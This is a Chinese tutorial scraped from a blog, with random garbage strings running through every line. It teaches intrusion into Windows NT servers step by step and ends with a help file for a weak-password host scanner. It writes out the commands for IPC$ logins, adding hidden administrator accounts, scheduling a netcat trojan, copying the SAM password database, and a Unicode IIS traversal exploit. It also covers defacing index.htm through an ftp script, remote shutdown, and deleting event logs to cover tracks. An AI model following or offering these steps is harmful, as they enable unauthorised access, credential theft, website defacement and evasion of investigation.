win下 远程控制(教程+工具+黑客常用命令)
文章转自:http://blog.cfan.com.cn/html/89/213089-7555.html
作者: 夏海伟
一般入侵所需要的几个常用命令 一般入侵所需要的几个常用命令 (命令中要注意其中的空格!!)
j5} i[ T M:Vlu0 1:NET
y M!P-i.P wv,U9i0 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 爱好者博墅U({}i+VI
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
4X6T SpI0 net use [url=file:127.0.0.1/ipc$]//127.0.0.1/ipc$[/url] "123456" /user:"hbx"
M3X ~7Ul6`0 退出的命令是 爱好者博墅6S!I!Y:n4K8l
net use [url=file:127.0.0.1/ipc$]//127.0.0.1/ipc$[/url] /delte 爱好者博墅}5E+Z3MPg?
下面的*作你必须登陆后才可以用.登陆的方法就在上面. 爱好者博墅m db7^.wv
----------------------
bLq|c8s Y/f2I0 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
? z1S�uHb0s eI0 我们加一个heibai的用户密码为lovechina
L�vC#nL/R^0 net user heibai lovechina /add 爱好者博墅o/B/6FU-QK
只要显示命令成功,那么我们可以把他加入Administrator组了.
(uV]u'N&dOh D0 net localgroup Administrators heibai /add
B�Q?:AF-f#wK0 ---------------------- 爱好者博墅:N9J I.`kF5Xe1R
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. 爱好者博墅9F-@/?6fz!K D
net use z://127.0.0.1/c$
_;e/{)Ic l*J0 ---------------------- 爱好者博墅2i7yg5w}0hu_ F]
net start telnet
nUu3}on0 这样可以打开对方的TELNET服务.
"ALUIW6q(S0 ----------------------
;R9H8i s$wQ0y0 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
M0`,EW8S PO4EA4@0 net user guest /active:yes
YY,HD b:]!C&f0 ----------------------
7i+G9L3o%/@�M0 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
:/.]zSaq"P0 net user guest lovechina 爱好者博墅c,F)p@ Vzkd]MD
net命令果然强大啊!
)djgX u0 2:at
9kJA&J8i u1x0 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 爱好者博墅*G.a'K,Br
那么需要用AT命令,这里假设你已经登陆了那个服务器。 爱好者博墅*dY@rA5yfUc}
你首先要得到对方的时间,
'mS|Z@"?H0 net time [url=file:127.0.0.1]//127.0.0.1[/url] 爱好者博墅6Y9i+oNb,e
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
+[kkB�_0 at [url=file:127.0.0.1]//127.0.0.1[/url] 12:3 nc.exe
GX�lT m~,_,J"a$}0 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
zs(OU5] ~k/F E!_0 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
LFa%a [B$f!QZ@0 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 爱好者博墅m/i%`}7| B/R@:m
3:telnet
(|/R? u-]a0 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
dUL�inu8OL"i/6g0 telnet 127.0.0.1 99
{8^?#nHc5T0 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 爱好者博墅Xo5VpPL
4:FTP 爱好者博墅X9P ?Y5k8B
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个 爱好者博墅s$lX g(/
http://WWW.51.NET , 爱好者博墅 An,T7[6RJ p'XIE7X
不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 爱好者博墅c(zs(QW K
在上传前需要登陆先,这里我们假设FTP服务器是 爱好者博墅U$e)L2X#~GY$`
http://WWW.51.NET ,
A9hz J%^Q0 用户名是HUCJS,密码是654321
"? NP?X0 ftp www.51.net
wJj5v$XO/&V'G4c.G0 他会要求输入用户,成功后会要求输入密码. 爱好者博墅d I| nrt
----------------------
'i UMW�a/i0 下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/
;^.W3p$JP0 get c:/index.htm d:/
`yU#U.@i0 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 爱好者博墅1s"X+d#] `gv
put c:/index.htm d:/
v�J ? y.^e_1S0 5:copy 爱好者博墅3@+s}mL{z
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 爱好者博墅b(Lc6N5c,V'J
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
q0p NE0u@ }%A0 copy index.htm [url=file:127.0.0.1/c$/index.htm]//127.0.0.1/c$/index.htm[/url] 爱好者博墅-CXBCO5t
---------------------- 爱好者博墅;}c/zTc Ax
如果你要复制到D盘下把C改为D,就行了! 爱好者博墅Om7Ra]vF0a�W+}
copy index.htm [url=file:127.0.0.1/d$/index.htm]//127.0.0.1/d$/index.htm[/url] 爱好者博墅/f+k$k7`
---------------------- 爱好者博墅#l+G7R:X_(s�Q'I
如果你要把他复制到WINNT目录里
@/af5}5I%m L0 就要把输入 爱好者博墅+_|g1EP
copy index.htm [url=file:127.0.0.1/admin$/index.htm]//127.0.0.1/admin$/index.htm[/url] 爱好者博墅.~,H`g3s*M Z
admin$是winnt
&II6F!l3cP0H5g0 ---------------------- 爱好者博墅7lpT.q;L1T
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:/winnt/repair/sam._ 爱好者博墅pu-~!e5x%Hc
sam._是数据库的文件名 爱好者博墅1r(C/Z(N^
下面就把127.0.0.1的数据库复制到本地C盘下 爱好者博墅 q#Z#?d^&aa
copy [url=file:127.0.0.1/admin$/repair/sam]//127.0.0.1/admin$/repair/sam[/url]._ c:/ 爱好者博墅0gr|'g�Pg9C7l~ b
---------------------- 爱好者博墅 ` J+I)| P
6:set
2IkyXV'G0 如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! 爱好者博墅|a0]k{1mS
下面是我得到的结果!我来分析它,只是找主页在那而已。
U},y7e P_Y�j0 COMPUTERNAME=PENTIUMII
Y~&Z2n3lc {0 ComSpec=D:/WINNT/system32/cmd.exe
Y8}6ot7MD:q[WH0 CONTENT_LENGTH=0 爱好者博墅.sy�Xj}ux bc
GATEWAY_INTERFACE=CGI/1.1
s'|_7DpiMm Z6I0 HTTP_ACCEPT=*/* 爱好者博墅3A~6JNp{%a~)H
HTTP_ACCEPT_LANGUAGE=zh-cn
$E4a&h.i"S9F2|@0 HTTP_CONNECTION=Keep-Alive 爱好者博墅r$f;M6^"e6T~
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了 爱好者博墅;pz9h&kRn B
HTTP_ACCEPT_ENCODING=gzip, deflate 爱好者博墅V#^'A(y9B9i T
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; 爱好者博墅/?zK2A)fe3Vd@E
DigExt) 爱好者博墅 s7FN?'u9s6M0`;}5c
NUMBER_OF_PROCESSORS=1
xM�F�i5^-la0 Os2LibPath=D:/WINNT/system32/os2/dll;
E3U'e@0l)p P0 OS=Windows_NT 爱好者博墅+aF N t!{�q
Path=D:/WINNT/system32;D:/WINNT
(UW Us6B0 PATHEXT=.COM;.EXE;.BAT;.CMD
6rG*ETlQ O@#V0 PATH_TRANSLATED=E:/vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:/vlroot 爱好者博墅RlT:B-G}
PROCESSOR_ARCHITECTURE=x86 爱好者博墅u_+HuZ'B
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3,
FA9s0D M(R:T0 GenuineIntel
6J~^&m |0 PROCESSOR_LEVEL=6
Qp4N�}R.AaI0 PROCESSOR_REVISION=0303
,DI(lX3/;i0 PROMPT=$P$G 爱好者博墅.z/[I0o4{|
QUERY_STRING=/c+set
,M1bwPFOcz b0 REMOTE_ADDR=XX.XX.XX.XX 爱好者博墅^:f"wfgk*ZD._
REMOTE_HOST=XX.XX.XX.XX
]1R X ngB'z0 REQUEST_METHOD=GET 爱好者博墅%Q"Go/W4?#Z*}E9r
s cript_NAME=/s cripts/..%2f../winnt/system32/cmd.exe 爱好者博墅]'o_qt^$n
SERVER_NAME=XX.XX.XX.XX
@ `0f`N&U0 SERVER_PORT=80 爱好者博墅X-P4K[Hh0g
SERVER_PORT_SECURE=0 爱好者博墅 iY_+U;ah$NR!zx*A-W
SERVER_PROTOCOL=HTTP/1.1 爱好者博墅F:S{./Y+m0tw!@
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
)D5vd/X1Q"K/0 SystemDrive=D: 爱好者博墅pj~Ub`"Sa
SystemRoot=D:/WINNT
5G [8czB'H5Qmxs0 TZ=GMT-9
9N)c6?)pk|0 USERPROFILE=D:/WINNT/Profiles/Default User 爱好者博墅4^|Lb3ihI
windir=D:/WINNT
W+/Q'g0z+kv&EY4{0 粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一 定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这 就是主页的名称了。 爱好者博墅[4Dl o.PiHb u W
7:nbtstat 爱好者博墅CU$G0V3OK6e.{g
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以 猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧! 爱好者博墅:ed:z Gb&u(H:Uv%T
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
$n5IZK&hX0 命令是 爱好者博墅` n,j1wt6N&D
nbtstat -A XX.XX.XX.XX 爱好者博墅aG0f%mrK;_m
-A一定要大写哦。
EqS1qq0{Bsa0 下面是得到的结果。
2w�z6av_A u8y0 NetBIOS Remote Machine Name Table
6u3T0X'xE0 Name Type Status
3i%h%k1SzF0 --------------------------------------------- 爱好者博墅 D!VT$`%p'f E,hM
Registered Registered Registered Registered Registered 爱好者博墅|"G�?N`v5h[
Registered Registered Reg
Q$D6zP Y0 istered Registered Registered Registered 爱好者博墅 i1s:Y@SP%N
MAC Address = 00-E0-29-14-35-BA 爱好者博墅"me$tYa&aoCO%K z/p
PENTIUMII UNIQUE 爱好者博墅*Ps+}u D8Hh�X7/
PENTIUMII UNIQUE 爱好者博墅#bL.LT"H*?lTN
ORAHOTOWN GROUP
M"E+q(W|0 ORAHOTOWN GROUP 爱好者博墅xp.npH!A j2|
ORAHOTOWN UNIQUE 爱好者博墅 G^T'E�x._
PENTIUMII UNIQUE
L,B DGu GrE*W0 INet~Services GROUP 爱好者博墅Vc9[9G%pRy
IS~PENTIUMII... UNIQUE
/i$K8C0P u0 ORAHOTOWN GROUP
r&S"Zg-UwU0 ORAHOTOWN UNIQUE
+I)mu})J%jJ,Fz0 ..__MSBROWSE__. GROUP 爱好者博墅p2FPU*wv
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是的话,那他前面的就是用户。
WowIp"N0 这里的用户是PENTIUMII。 爱好者博墅SUt W1w3S7A9RD
8:Shutdown
1y&}$dEx%T%[+xj+pq0 关了对方的NT服务器的命令 爱好者博墅q1D9p'wQPt
Shutdown [url=file:IP]//IP[/url]地址 t:20 爱好者博墅jb ho)c
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 爱好者博墅3?Q%c0@{4Y(q
9:DIR
9Nd5C)[ G j cE0 这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 爱好者博墅ZE&~J*t%u6`O E
你可以本地试下。
&c'wY2V ^4F g0 10:echo
wV$sZ hT1L _C p0 著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
ir)U|7f7I7?D0 我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
oUtj$vr0 echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
3Y:J jl j2{#z0 echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm 爱好者博墅2MSt E*?
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
'W4|x0[^0 第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。 爱好者博墅$^[;I(gq%K*p
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
i SxB Wf f0 大家可以本地试下。 爱好者博墅seI)@0Dy+j
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
9j6b*g?6U?g:L7Cv!F2O0 1、首先,我们需要申请一个免费的主页空间。 爱好者博墅*`"?3oz z?v
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。) 爱好者博墅,I4}0~{;p5c
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的) 爱好者博墅STB@|:Y;u,E
cnhack(你申请时的用户名) 爱好者博墅 k�I[RB
test(你申请时的密码) 爱好者博墅ZA0a1kbk }Z
get index.htm 爱好者博墅;t8_4S!LMi0u*X|
c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
O/kP[Z%|.z_C0 bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
.s V-PQU&|0 具体的做法:
;S0|*X8w!G#x%sP/A0 输入 echo open upload.chinaren.com> c:/cnhack.txt
,F%L Sb5b0 输入 echo cnhack >> c:/cnhack.txt
%_-@sq-`0 输入 echo 39abs >> c:/cnhack.txt 爱好者博墅"/y0H;|[e
输入 echo get index.htm 爱好者博墅l k.J.y$YX
c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt 爱好者博墅0A*vl2HNUw@
最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
y_0N O'bEu0 等命令完成时,文件已经下载到你指定的文件里了。
9o%I&Y(c O3Vn*Om0 注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
e+j,o0p7D;{'C$L0 记得要 del c:/cnhack.txt 爱好者博墅 fFl�[^
11:attrib
R.a'Y8FR0 这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
lBgB?0 attrib -r index.htm
T*z:e8^3Dg%e6e#h5DH0 这个命令是把index.htm的只读属性去掉。
(e s8[`+@+GiU]6V V0 如果把“-”改为“+”则是把这个文件的属性设置为只读 爱好者博墅3f0Oh |x$z4O
---------------------- 爱好者博墅-o*F8A0IE_"DP
attrib +r index.htm
1P/q_ Hg0[^0 这个命令是把index.htm的属性设置为只读。
cCN8Tre7[/d0 12:del 爱好者博墅}2Va,J'i;D
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。 爱好者博墅;e e ]c2S;V.D)/$Sw Jm
NT的日志有这些 爱好者博墅*n)g s.cx?)Z N0|,|
del C:/winnt/system32/logfiles/*.* 爱好者博墅Kd/S2^.Wj
del C:/winnt/ssytem32/config/*.evt
%h!N*?#Fh#?,Vj1o0 del C:/winnt/system32/dtclog/*.* 爱好者博墅:uMN0Io.B
del C:/winnt/system32/*.log
KrCON}b+j0 del C:/winnt/system32/*.txt
N.U]~n5n n;Lx0 del C:/winnt/*.txt 爱好者博墅 g!`0M'{/Ac'pC
del C:/winnt/*.log 爱好者博墅 Hna@$R$GU
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。
%j$d8H4MNC3f6HA0
Q1SOV9DT[ Xu0 ::: 啊D网络工具包 帮助文件 :::
BE*ZF0{-oA(Yh0 软件功能如下:爱好者博墅 @iq+w]'v0{r8N
---------------------------------------------------------------------------------
"jh m;xh3]/L]0 1. 共享资源查找 [为你查找网上的共享资源!]
2r| ?q%d!J.JP%~0 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便]爱好者博墅0Z G K)A"M/ox#~/j
3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]爱好者博墅tnPw RFA
4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]
XL1D-wsL2k0 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]爱好者博墅5@x3`*_f0d)Z
6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]
kqy8A%[i df0 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]
-czvE?S%k%D3N6?0 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]爱好者博墅mM/y h8j0Jk
4. 端口扫描 [使你更加了解对方主机端口的打开状况]爱好者博墅"I^ U9r G n:p-b| l N1c
5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]爱好者博墅 Mvp0w2S`8rp
6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
O2e/+g%y)rg5N0 7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]
;c$UL d Pr0 8. Ping [判断某IP是否和网络连接的好帮手!]
olWd@u;^sL0 9. 域名IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]
,tQ6gEO a0 10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]
?G7s�K6~HV5xIR9V0 11. Finger [Finger能为你查询对方系统的用户信息!]爱好者博墅O�y/e+g,Bq gU,Of
12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]爱好者博墅9}v2?8{PZG3B4E
13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]
~#G|l,uw df8J0 14. 常用修改 [反恶意网页修改,恢复系统设置等]爱好者博墅-}tX8al:Oc.J
19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]
(W!N},d�D0 ---------------------------------------------------------------------------------
5W!rr|F;f$M?F0 支持的系统:win98/WinMe/win2000/WinXP/WinNT
6v*r)?X@;j#p0 功能键说明:爱好者博墅q:Y~Bf
Ctrl+'1' ~ '9' 显示指定数字的页面
4Q+O'c9kF"{0 CtrL+'-' 前一页
J Q Yg;y&E0 CtrL+'+' 后一页爱好者博墅.Z8S6Gh7}G~FS
* 在IP1输入框里双击鼠标左键转到"主机查询"爱好者博墅 Pxg dQAV
* 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP!爱好者博墅8kA:Fitxn
* 在程序里,大部分地方都有右键功能!爱好者博墅%FPcO!v;|b
===================================爱好者博墅7s)h.G'xW cUx UK
文件组成爱好者博墅2bv.tQ4R/IC"}
===================================爱好者博墅�`O4^*s~ ~6v3u(m
DTools.exe 主要的执行文件爱好者博墅6t7N'Pl(j
Help.txt 帮助文件
s�vmMH0 Setup.ini 设置文件
$_ rTp4|#@#HcQ#E /0 IP.^_^ IP数据文件
b+`9h/Wx{6C0 *.d99 共享资源文件爱好者博墅2V)f5O&nO)~]^-es
*.Por 指定扫描的端口文件
4~/{Y0e.G*{ F a'gy0 爱好者博墅U'W;XF-w r;k-n
==================================================================
!Q2t qV(K;h}8@0 一些常用的DOS网络命令
qg$|c$M0 ==================================================================爱好者博墅~|;C%U2U$H
net share abc$=c:/ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
$w.{*?b(q[ G D0 net share c$ /del 禁止C$共享爱好者博墅i Q^�?s$F
net use z: [url=file:*.*.*.*/C$]//*.*.*.*/C$[/url] 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘爱好者博墅%V2rz�Ic,HJ
net use c: /del 删除映射的c盘
1j/J uXX0 net use * /del /y 删除全部爱好者博墅_ `6W@v/H1cT
net start 显示本地主机当前服务爱好者博墅hy"v"c'ICM
net start telnet 启动 Telnet 服务
3n ^%}}:o,a2i0 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)爱好者博墅]0yb z$T�s
net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)!
s*e5Z2c)i;U8DHu0 net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)爱好者博墅#]/X~lw
net user 得到本地主机的用户列表爱好者博墅RnV"Pq%G6`dZ M
net user guest /active:yes 将停用的guest帐号激活(变为可用)爱好者博墅/]6]6d6CSQ ^
net user guest 888888 把 Guest 帐号的密码改为 888888
2f#Fk0/.j8l)q0 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了)爱好者博墅%u@3C#Zpf3h&s
net view //*.*.*.* 查看指定IP主机上的共享爱好者博墅J#WL$}%|%Oo
nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表爱好者博墅;loW,FHP`
net share 查看本地主机的共享资源(本地的默认共享也可以看到)爱好者博墅k(sl,MS)sU
net use [url=file:*.*.*.*/ipc$]//*.*.*.*/ipc$[/url] "" /user:"" 建立空连接爱好者博墅�W.s3m&?}[ZlgT
telnet *.*.*.* 90 连接对方机子的telnet,端口为90
h(? P#aePx4|~]0 ipconfig 查看本机的IP信息爱好者博墅&ULE4vwk
入侵ipc过程序命令爱好者博墅9n*m2_qZWd
-----------------------------------------------爱好者博墅w8E g8@Q VKj
net use [url=file:*.*.*.*/ipc$]//*.*.*.*/ipc$[/url] "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接爱好者博墅#b-S#Vevh-A9e5[(_?
copy server1.exe [url=file:*.*.*.*/Admin$/system32]//*.*.*.*/Admin$/system32[/url] 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内爱好者博墅$v-R-kCp"t4CA'n+/
net time //*.*.*.* 查看远程主机的当前时间爱好者博墅TW!w2{y:q%h/ K0L$t-yi
at //*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务
]U'C/z5hsGn0 netstat [-r] [-s] [-n] [-a] 爱好者博墅"D~'Ro^k"W.g
参数含义: 爱好者博墅q{ }%J,TC)|ix
-r 显示本机路由表的内容; 爱好者博墅*L'N z�l^/@"O2Y+eX$vG
-s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议);
jfofd;l {j8E JBO0 -n 以数字表格形式显示地址和端口; 爱好者博墅h@_,a-Q7z#HR:E;j8P&Z
-a 显示所有主机的端口号。
`9y*Yt ChvvY&S
win下 远程控制(教程+工具+黑客常用命令)相关推荐
- 数据包构造分析工具Hping3常用命令集合大学霸IT达人
数据包构造分析工具Hping3常用命令集合大学霸IT达人 Hping是一个命令行下使用的TCPIP数据包组装分析工具.该工具的命令模式很像Unix下的ping命令.它不止能发送ICMP回应请求,还支持 ...
- 73.JVM内存基础结构,参数分类,推荐的配置项,参数混用问题,常用工具,常用命令
73.JVM内存基础结构,参数分类,推荐的配置项,参数混用问题,常用工具,常用命令 73.1.堆内存基本结构 73.2.参数分类 73.3.推荐的配置项 73.4.参数混用问题 73.5.常用命令 7 ...
- Web安全工具—Sqlmap常用命令和参数(持续更新)
Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...
- 暴力破解工具Hydra 常用命令总结
暴力破解工具Hydra 常用命令总结 命令: -R 修复之前使用的aborted/crashed session -S 执行SSL(Secure Socket Layer)连接 -s Port 使用非 ...
- java反编译命令jad,java反编译小工具jad常用命令
java反编译小工具jad常用命令 2014/6/11 19:39:24 sky52bc 程序员俱乐部 我要评论(0) 摘要:首先,看一下jad的帮助提示-a-用JVM字节格式来注解输出-af- ...
- 基于ARP的网络扫描工具netdiscover常用命令集合大学霸IT达人
基于ARP的网络扫描工具netdiscover常用命令集合大学霸IT达人 ARP是将IP地址转化物理地址的网络协议.通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机.netdisc ...
- 批量探测工具fpingping常用命令集合大学霸IT达人
批量探测工具fpingping常用命令集合大学霸IT达人 批量探测工具fpingping是各个系统自带的基于ICMP协议的主机探测工具.但该工具一次只能检测一个主机,不满足渗透测试批量探测的需要.fp ...
- ARP探测目标工具arping常用命令集合大学霸IT达人
ARP探测目标工具arping常用命令集合大学霸IT达人 ARP协议是一种将IP地址转化物理地址的协议.通过ARP请求包和响应包,可以判断一个IP地址是否在使用.同理,通过该协议可以探测局域网主机是否 ...
- Wifitap是一个WiFi注入工具集常用命令集合大学霸IT达人
Wifitap是一个WiFi注入工具集常用命令集合大学霸IT达人 该工具集允许任何应用程序都可以发送和接收IP数据包,使用802.11流量捕获和注入,并通过WiFi网络简单配置接口wj0.Wifita ...
- 无线密码离线破解工具Pyrit常用命令集合大学霸IT达人
无线密码离线破解工具Pyrit常用命令集合大学霸IT达人 Pyrit是一款可以使用GPU加速的无线密码离线破解工具.该工具提供了大量的命令,可以用来实现不同的功能.使用Pyrit工具中的命令,可以通过 ...
最新文章
- Excel 中如何找出两列数据中不重复的记录
- Python的线程/进程间通讯对象分析
- 怎样加速微软商店服务器,windows10系统如何加快应用商店打开速度【图文教程】...
- mvc中html对象的方法吗,在MVC中使用jQuery模板进行HTML编码的Json对象
- simulink 快捷键 运行_【泡泡读者来搞】ROS、Simulink、Carsim的互联与规划、控制算法的验证...
- [备忘]java读取与写入文件的五种方式
- 前端怎么做接口签名验证 -baijiahao_阿里一面:如何保证API接口数据安全?
- 牛客网_Wannafly模拟赛1
- python属于哪种类型_下列哪种类型是Python的列表类型?
- SAP、ERP、OA名词解释,SAP与ERP区别; ERP与OA区别
- 腾讯安全全面出击:双十一不该成为黑产的狂欢
- python名片识别_百度AI攻略:名片识别
- 分布式基础-分布式事务
- Markdown 前言
- HTML简易奥运五环
- ucenter应用通信过程
- 网红KOL营销怎么做?如何寻找合适的网红KOL?
- 01-图灵商城项目架构
- 到底要不要在office/wps平台上做开发
- 仿京细菜谱微信小程序源码云开版
热门文章
- 银河麒麟国产操作系统使用指南
- java数字金额大写金额_Java实现 “ 将数字金额转为大写中文金额 ”
- 坚果Pro 电源键失效的处理
- drf-路由组件:自动生成Routers路由、 使用方法、视图集中附加action的声明、自动生成路由router的两种方式的URL区别
- Cadence 应用注意事项--转载
- 北鲲云超算平台药物发现Cloud-HPCAI解决方案助力生命科学行业
- 黑苹果从入门到精通:可能是世界上最详细的VMware安装macOS教程
- linux:framebuffer驱动之ssd1363驱动和fbtft驱动修改
- 不需编程也可实现钉钉自动打卡
- 51单片机 引脚功能定义,内部框图